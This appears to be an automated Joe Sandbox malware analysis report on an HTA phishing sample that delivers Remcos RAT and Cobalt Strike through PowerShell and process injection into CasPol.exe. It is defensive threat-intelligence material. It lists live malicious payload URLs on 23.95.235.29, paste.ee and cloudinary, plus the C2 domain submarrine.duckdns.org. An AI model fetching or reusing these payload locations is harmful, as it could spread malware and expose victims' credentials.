                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \key3.db12_2_0040B335

                          Remote Access Functionality

                          barindex
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-GH3PRLJump to behavior
                          Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.powershell.exe.7205a48.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.powershell.exe.7205a48.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000C.00000002.3843532128.0000000002DBE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.3841776803.0000000001028000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000002.1784462151.0000000007165000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000002.1784462151.00000000062FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8184, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6832, type: MEMORYSTR
                          Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: cmd.exe12_2_00405042
                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information111
                          Scripting
                          Valid Accounts1
                          Native API
                          111
                          Scripting
                          1
                          DLL Side-Loading
                          1
                          Deobfuscate/Decode Files or Information
                          1
                          OS Credential Dumping
                          2
                          System Time Discovery
                          Remote Services11
                          Archive Collected Data
                          1
                          Web Service
                          Exfiltration Over Other Network Medium1
                          System Shutdown/Reboot
                          CredentialsDomainsDefault Accounts1
                          Exploitation for Client Execution
                          1
                          DLL Side-Loading
                          1
                          Bypass User Account Control
                          2
                          Obfuscated Files or Information
                          211
                          Input Capture
                          1
                          Account Discovery
                          Remote Desktop Protocol1
                          Email Collection
                          12
                          Ingress Tool Transfer
                          Exfiltration Over Bluetooth1
                          Defacement
                          Email AddressesDNS ServerDomain Accounts13
                          Command and Scripting Interpreter
                          1
                          Windows Service
                          1
                          Access Token Manipulation
                          1
                          DLL Side-Loading
                          2
                          Credentials In Files
                          1
                          System Service Discovery
                          SMB/Windows Admin Shares211
                          Input Capture
                          21
                          Encrypted Channel
                          Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal Accounts2
                          Service Execution
                          Login Hook1
                          Windows Service
                          1
                          Bypass User Account Control
                          NTDS3
                          File and Directory Discovery
                          Distributed Component Object Model3
                          Clipboard Data
                          1
                          Remote Access Software
                          Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud Accounts3
                          PowerShell
                          Network Logon Script222
                          Process Injection
                          1
                          Masquerading
                          LSA Secrets34
                          System Information Discovery
                          SSHKeylogging2
                          Non-Application Layer Protocol
                          Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                          Virtualization/Sandbox Evasion
                          Cached Domain Credentials21
                          Security Software Discovery
                          VNCGUI Input Capture213
                          Application Layer Protocol
                          Data Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                          Access Token Manipulation
                          DCSync21
                          Virtualization/Sandbox Evasion
                          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job222
                          Process Injection
                          Proc Filesystem3
                          Process Discovery
                          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                          Application Window Discovery
                          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                          System Owner/User Discovery
                          Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576578 Sample: greatnicefeatureswithsuperc... Startdate: 17/12/2024 Architecture: WINDOWS Score: 100 55 submarrine.duckdns.org 2->55 57 paste.ee 2->57 59 2 other IPs or domains 2->59 67 Suricata IDS alerts for network traffic 2->67 69 Found malware configuration 2->69 71 Malicious sample detected (through community Yara rule) 2->71 77 17 other signatures 2->77 11 mshta.exe 1 2->11         started        signatures3 73 Uses dynamic DNS services 55->73 75 Connects to a pastebin service (likely for C&C) 57->75 process4 signatures5 101 Suspicious command line found 11->101 103 PowerShell case anomaly found 11->103 14 cmd.exe 1 11->14         started        process6 signatures7 105 Detected Cobalt Strike Beacon 14->105 107 Suspicious powershell command line found 14->107 109 Wscript starts Powershell (via cmd or directly) 14->109 111 PowerShell case anomaly found 14->111 17 powershell.exe 41 14->17         started        22 conhost.exe 14->22         started        process8 dnsIp9 53 23.95.235.29, 49706, 80 AS-COLOCROSSINGUS United States 17->53 45 freesizedressforna...nthiscaseforyou.vbS, Unicode 17->45 dropped 47 C:\Users\user\AppData\...\eykjjr5p.cmdline, Unicode 17->47 dropped 79 Loading BitLocker PowerShell Module 17->79 24 wscript.exe 1 17->24         started        27 csc.exe 3 17->27         started        file10 signatures11 process12 file13 93 Detected Cobalt Strike Beacon 24->93 95 Suspicious powershell command line found 24->95 97 Wscript starts Powershell (via cmd or directly) 24->97 99 2 other signatures 24->99 30 powershell.exe 15 16 24->30         started        51 C:\Users\user\AppData\Local\...\eykjjr5p.dll, PE32 27->51 dropped 34 cvtres.exe 1 27->34         started        signatures14 process15 dnsIp16 63 cloudinary.map.fastly.net 151.101.193.137, 443, 49707 FASTLYUS United States 30->63 65 paste.ee 172.67.187.200, 443, 49710 CLOUDFLARENETUS United States 30->65 113 Writes to foreign memory regions 30->113 115 Injects a PE file into a foreign processes 30->115 36 CasPol.exe 30->36         started        39 CasPol.exe 3 2 30->39         started        43 conhost.exe 30->43         started        signatures17 process18 dnsIp19 81 Contains functionality to bypass UAC (CMSTPLUA) 36->81 83 Contains functionalty to change the wallpaper 36->83 85 Contains functionality to steal Chrome passwords or cookies 36->85 91 3 other signatures 36->91 61 submarrine.duckdns.org 192.169.69.26, 49711, 49712, 49714 WOWUS United States 39->61 49 C:\ProgramData\remcos\logs.dat, data 39->49 dropped 87 Detected Remcos RAT 39->87 89 Installs a global keyboard hook 39->89 file20 signatures21

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand
                          SourceDetectionScannerLabelLink
                          greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta28%VirustotalBrowse
                          greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta21%ReversingLabsWin32.Phishing.Generic
                          No Antivirus matches
                          No Antivirus matches
                          No Antivirus matches
                          SourceDetectionScannerLabelLink
                          http://23.95.235.29/118/freesizedressfornaturalbeautyinthiscaseforyougood.tIFT0%Avira URL Cloudsafe
                          http://23.95.235.29/118/freesizedressfornaturalbeautyinthiscaseforyougood.tIF100%Avira URL Cloudmalware
                          http://23.95.235.29/118/freesizedressfornaturalbeautyinthiscaseforyougood.tIFon0%Avira URL Cloudsafe
                          http://crl.microM~0%Avira URL Cloudsafe
                          https://analytics.paste.ee0%Avira URL Cloudsafe
                          http://23.95.235.29/118/freesizedressfornaturalbeautyinthiscaseforyougood.tIFsoft.WindowsErrorReport0%Avira URL Cloudsafe
                          https://www.google.com;0%Avira URL Cloudsafe
                          http://23.95.235.29/118/freesizedressfornaturalbeautyinthiscaseforyougood.tIFC:0%Avira URL Cloudsafe
                          http://23.95.235.29/118/freesizedressfornaturalbeautyinthiscaseforyougood.tIF90%Avira URL Cloudsafe
                          http://crl.microG0%Avira URL Cloudsafe
                          https://cdnjs.cloudflare.com;0%Avira URL Cloudsafe
                          https://analytics.paste.ee;0%Avira URL Cloudsafe
                          http://23.95.235.29/0%Avira URL Cloudsafe
                          submarrine.duckdns.org100%Avira URL Cloudmalware
                          http://23.95.235.29/118/freesize0%Avira URL Cloudsafe
                          NameIPActiveMaliciousAntivirus DetectionReputation
                          paste.ee
                          172.67.187.200
                          truefalse
                            high
                            cloudinary.map.fastly.net
                            151.101.193.137
                            truefalse
                              high
                              submarrine.duckdns.org
                              192.169.69.26
                              truetrue
                                unknown
                                res.cloudinary.com
                                unknown
                                unknownfalse
                                  high
                                  NameMaliciousAntivirus DetectionReputation
                                  http://23.95.235.29/118/freesizedressfornaturalbeautyinthiscaseforyougood.tIFtrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://paste.ee/r/qVzWL/0false
                                    high
                                    submarrine.duckdns.orgtrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpgfalse
                                      high
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1509414066.000000000597B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1784462151.00000000062FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.1506870890.0000000004A68000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.1784462151.00000000053E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://23.95.235.29/118/freesizedressfornaturalbeautyinthiscaseforyougood.tIFTpowershell.exe, 00000003.00000002.1513173387.0000000008035000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1506870890.0000000004A68000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://crl.microsoftpowershell.exe, 00000003.00000002.1513173387.0000000008035000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.1784462151.00000000053E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://go.micropowershell.exe, 00000003.00000002.1506870890.0000000005092000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://crl.microGpowershell.exe, 00000003.00000002.1505549231.0000000002906000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://contoso.com/Licensepowershell.exe, 00000008.00000002.1784462151.00000000062FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.google.com;powershell.exe, 00000008.00000002.1784462151.00000000054FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://contoso.com/Iconpowershell.exe, 00000008.00000002.1784462151.00000000062FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://analytics.paste.eepowershell.exe, 00000008.00000002.1784462151.00000000054FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://23.95.235.29/118/freesizedressfornaturalbeautyinthiscaseforyougood.tIFonpowershell.exe, 00000003.00000002.1513173387.0000000008035000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://go.microspowershell.exe, 00000003.00000002.1506870890.0000000005092000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.1784462151.00000000053E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://geoplugin.net/json.gpCasPol.exefalse
                                                              high
                                                              https://www.google.compowershell.exe, 00000008.00000002.1784462151.00000000054FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://23.95.235.29/118/freesizedressfornaturalbeautyinthiscaseforyougood.tIFC:powershell.exe, 00000003.00000002.1511477810.00000000070D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://23.95.235.29/118/freesizedressfornaturalbeautyinthiscaseforyougood.tIF9powershell.exe, 00000003.00000002.1513173387.0000000008035000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://res.cloudinary.compowershell.exe, 00000008.00000002.1784462151.00000000053E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://23.95.235.29/118/freesizedressfornaturalbeautyinthiscaseforyougood.tIFsoft.WindowsErrorReportpowershell.exe, 00000003.00000002.1513173387.0000000008035000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://crl.microM~powershell.exe, 00000003.00000002.1513173387.0000000008035000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://geoplugin.net/json.gp/Cpowershell.exe, 00000008.00000002.1784462151.0000000007165000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1784462151.00000000062FB000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://aka.ms/pscore6lBpowershell.exe, 00000003.00000002.1506870890.0000000004911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1784462151.0000000005291000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpgtpowershell.exe, 00000008.00000002.1784462151.00000000053E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1506870890.0000000004A68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://contoso.com/powershell.exe, 00000008.00000002.1784462151.00000000062FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1509414066.000000000597B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1784462151.00000000062FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://23.95.235.29/powershell.exe, 00000003.00000002.1513173387.0000000008035000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://analytics.paste.ee;powershell.exe, 00000008.00000002.1784462151.00000000054FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://cdnjs.cloudflare.compowershell.exe, 00000008.00000002.1784462151.00000000054FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://cdnjs.cloudflare.com;powershell.exe, 00000008.00000002.1784462151.00000000054FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1506870890.0000000004911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1784462151.0000000005291000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://secure.gravatar.compowershell.exe, 00000008.00000002.1784462151.00000000054FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://themes.googleusercontent.compowershell.exe, 00000008.00000002.1784462151.00000000054FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://23.95.235.29/118/freesizepowershell.exe, 00000003.00000002.1506870890.0000000004D35000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://github.com/dahall/taskschedulerpowershell.exe, 00000008.00000002.1784462151.0000000006E40000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs
                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        172.67.187.200
                                                                                        paste.eeUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        23.95.235.29
                                                                                        unknownUnited States
                                                                                        36352AS-COLOCROSSINGUStrue
                                                                                        151.101.193.137
                                                                                        cloudinary.map.fastly.netUnited States
                                                                                        54113FASTLYUSfalse
                                                                                        192.169.69.26
                                                                                        submarrine.duckdns.orgUnited States
                                                                                        23033WOWUStrue
                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1576578
                                                                                        Start date and time:2024-12-17 09:44:16 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 8m 53s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:16
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta
                                                                                        Detection:MAL
                                                                                        Classification:mal100.rans.phis.troj.spyw.expl.evad.winHTA@20/17@5/4
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 75%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 99%
                                                                                        • Number of executed functions: 66
                                                                                        • Number of non-executed functions: 181
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .hta
                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 20.109.210.53
                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                        • Execution Graph export aborted for target mshta.exe, PID 7768 because there are no executed function
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        TimeTypeDescription
                                                                                        03:45:10API Interceptor121x Sleep call for process: powershell.exe modified
                                                                                        03:46:20API Interceptor5121523x Sleep call for process: CasPol.exe modified
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        172.67.187.200geHxbPNEMi.vbsGet hashmaliciousUnknownBrowse
                                                                                        • paste.ee/d/1QtpX
                                                                                        MT103-8819006.DOCS.vbsGet hashmaliciousUnknownBrowse
                                                                                        • paste.ee/d/rYCH1
                                                                                        LETA_pdf.vbsGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                                                        • paste.ee/d/0jfAN
                                                                                        PO 2725724312_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                        • paste.ee/d/tiRif
                                                                                        EWW.vbsGet hashmaliciousUnknownBrowse
                                                                                        • paste.ee/d/gFlKP
                                                                                        ODC#PO 4500628950098574654323567875765674433##633.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                        • paste.ee/d/JxxYu
                                                                                        Purchase Order PO0193832.vbsGet hashmaliciousUnknownBrowse
                                                                                        • paste.ee/d/Bpplq
                                                                                        Name.vbsGet hashmaliciousUnknownBrowse
                                                                                        • paste.ee/d/0kkOm
                                                                                        517209487.vbsGet hashmaliciousXWormBrowse
                                                                                        • paste.ee/d/s0kJG
                                                                                        screen_shots.vbsGet hashmaliciousXWormBrowse
                                                                                        • paste.ee/d/GoCAw
                                                                                        23.95.235.29sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                        • 23.95.235.29/439/weareusinggoodcompaniesforgifitingbesthingsformetoget.tIF
                                                                                        Statement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
                                                                                        • 23.95.235.29/439/wse/sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.hta
                                                                                        Statement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
                                                                                        • 23.95.235.29/439/wse/sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.hta
                                                                                        Statement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
                                                                                        • 23.95.235.29/439/wse/sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.hta
                                                                                        NB PO-104105107108.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 23.95.235.29/118/sup/greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta
                                                                                        greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                        • 23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIF
                                                                                        Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta
                                                                                        nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                        • 23.95.235.29/808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIF
                                                                                        invoice09850.xlsGet hashmaliciousRemcosBrowse
                                                                                        • 23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta
                                                                                        Invoice A037.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        paste.eeseethebestmethodwithgreatnessgoodnewsgreatdaygivenme.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                        • 104.21.84.67
                                                                                        sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                        • 172.67.187.200
                                                                                        createdbetterthingswithgreatnressgivenmebackwithnice.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                        • 104.21.84.67
                                                                                        givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                        • 104.21.84.67
                                                                                        clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                        • 172.67.187.200
                                                                                        PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                                                        • 104.21.84.67
                                                                                        NB PO-104105107108.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 188.114.96.6
                                                                                        greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                        • 104.21.84.67
                                                                                        goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                        • 172.67.187.200
                                                                                        creamkissingthingswithcreambananapackagecreamy.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                        • 104.21.84.67
                                                                                        cloudinary.map.fastly.netseethebestmethodwithgreatnessgoodnewsgreatdaygivenme.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                        • 151.101.1.137
                                                                                        sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                        • 151.101.193.137
                                                                                        createdbetterthingswithgreatnressgivenmebackwithnice.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                        • 151.101.1.137
                                                                                        PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                                                        • 151.101.193.137
                                                                                        NB PO-104105107108.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 151.101.193.137
                                                                                        greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                        • 151.101.1.137
                                                                                        goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                        • 151.101.1.137
                                                                                        creamkissingthingswithcreambananapackagecreamy.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                        • 151.101.1.137
                                                                                        Cot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
                                                                                        • 151.101.129.137
                                                                                        Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 151.101.1.137
                                                                                        submarrine.duckdns.orgsweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                        • 192.169.69.26
                                                                                        greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                        • 192.3.101.149
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        WOWUSRFQ_#24429725,pdf.exeGet hashmaliciousAsyncRATBrowse
                                                                                        • 192.169.69.26
                                                                                        hesaphareketi-01.pdf.exeGet hashmaliciousAsyncRATBrowse
                                                                                        • 192.169.69.26
                                                                                        seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                        • 192.169.69.26
                                                                                        sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                        • 192.169.69.26
                                                                                        1734388385543fca13ccf5614dc71c1922a5cd8cddeb80fc9e4bce55f618d2232c3744cd06117.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                        • 192.169.69.26
                                                                                        x295IO8kqM.exeGet hashmaliciousRemcosBrowse
                                                                                        • 192.169.69.26
                                                                                        zvXPSu3dK5.exeGet hashmaliciousAsyncRATBrowse
                                                                                        • 192.169.69.26
                                                                                        173398584769f9c5bcf28a71f77fba1335e77fe6b4cc4f05afc05fdd9f5830429be0bc9fb5758.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                        • 192.169.69.26
                                                                                        nicegirlforyou.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                        • 192.169.69.26
                                                                                        1733858044e64c59622ab494dda2ff98fce76991f7e15e513d6a3620e7f58ad7cc67d3889c571.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                        • 192.169.69.26
                                                                                        AS-COLOCROSSINGUSsweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                        • 23.95.235.29
                                                                                        createdbetterthingswithgreatnressgivenmebackwithnice.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                        • 172.245.123.12
                                                                                        ORDER-24171200967.XLS..jsGet hashmaliciousWSHRat, Caesium Obfuscator, STRRATBrowse
                                                                                        • 192.3.220.6
                                                                                        newthingswithgreatupdateiongivenbestthingswithme.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                        • 107.173.4.16
                                                                                        crreatedbestthingswithgreatattitudeneedforthat.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                        • 107.173.4.16
                                                                                        Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 192.3.179.166
                                                                                        Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 192.3.179.166
